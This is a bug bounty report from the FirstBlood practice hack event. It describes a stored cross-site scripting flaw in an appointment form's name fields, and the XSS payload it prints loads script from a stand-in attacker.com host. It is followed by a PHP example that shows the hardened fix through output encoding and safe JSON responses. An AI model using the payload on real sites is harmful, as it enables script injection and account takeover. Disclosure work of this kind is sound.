FirstBlood-#284 Cross Site Scripting vulnerability in client firstname/lastname



On 2021-05-15, YouGina reported:

Summary

Using the form to create an appointment (located at endpoint /book-appointment.html) it is possible to inject an XSS payload which will trigger on one of the endpoints in the backend panel. This form sends a post request to the endpoint /api/ba.php. The Firstname and Lastname fields are vulnerable. In the post request these are the fname and lname parameters.

Steps to reproduce

Make sure a proxy is running in the background, or keep developer tools in the browser open on the network tab.

  1. Open the book-appointment.html page
  2. Fill in all the fields normally
  3. Replace the firstname and lastname fields with the payload: <script/src="//attacker.com/script.js"></script/onerror> (Replace the URL with a JavaScript file on a URL that you control)
  4. Submit the form
  5. Now login as a doctor and click the latest added appointment.
  6. Go to the proxy, or the network tab in developer tools of the browser and find the latest request.
  7. Open this URL in the browser

The JavaScript on the provided URL should now have executed. See attached screenshot as an example output:

The payload I used for that Proof of Concept is:

alert("PoC - [email protected]\rdocument.domain: " + document.domain + "\rlocation.origin: " + location.origin);

Impact

It is possible to execute any JavaScript in the context of the logged in user (in this case drAdmin).

P2 High

Endpoint: /drpanel/drapi/query.php?aptid={appointmentid}

Parameter: fname and lname

Payload: <script/src="//attacker.com/script.js"></script/onerror>


FirstBlood ID: 10
Vulnerability Type: Stored XSS

When creating an appointment, it is possible to get stored XSS on /drapi/query.php via the patient's name
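A hardened rewrite of the appointment lookup behind the doctor panel, added here as an example and not FirstBlood's own code. The table layout, column names and function names are assumptions; the stored name is the payload from the report, and an in-memory SQLite table stands in for the real database so the script runs offline.

```php
<?php
declare(strict_types=1);
// Added example, not FirstBlood's code: the appointment lookup rebuilt so that
// a patient name containing markup is returned as data, never parsed as HTML.

// Encode a stored string for safe insertion into HTML text or attribute values.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function fetch_appointment(PDO $db, int $aptid): ?array {
    $stmt = $db->prepare('SELECT fname, lname FROM appointments WHERE id = ?');
    $stmt->execute([$aptid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Variant A: the panel consumes the response with JavaScript, so answer with JSON
// and a JSON content type. The stored markup is then never parsed as HTML, even
// when the URL from step 7 of the report is opened directly in the browser.
function json_body(?array $appointment): string {
    return json_encode($appointment ?? ['error' => 'not found'],
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
}

// Variant B: the endpoint renders HTML itself; every stored field goes through h().
function html_body(array $appointment): string {
    return '<p class="patient">' . h($appointment['fname']) . ' ' . h($appointment['lname']) . '</p>';
}

// Constructed data (assumed schema): one appointment whose name fields hold the reported payload.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE appointments (id INTEGER PRIMARY KEY, fname TEXT, lname TEXT)');
$payload = '<script/src="//attacker.com/script.js"></script/onerror>';
$db->prepare('INSERT INTO appointments (fname, lname) VALUES (?, ?)')->execute([$payload, $payload]);

// Reject anything but a positive integer id before touching the database ('1' is the CLI default).
$aptid = filter_var($_GET['aptid'] ?? '1', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($aptid === false) {
    http_response_code(400);
    exit('bad aptid');
}

$apt = fetch_appointment($db, $aptid);
header('Content-Type: application/json; charset=utf-8');
header('X-Content-Type-Options: nosniff');
echo json_body($apt), "\n";
// html_body($apt) would yield &lt;script/src=... , which the browser displays as text.
```

The nosniff header matters because without it a browser opening the URL directly may still sniff the body as HTML.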


Respect Earnt: 1500000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.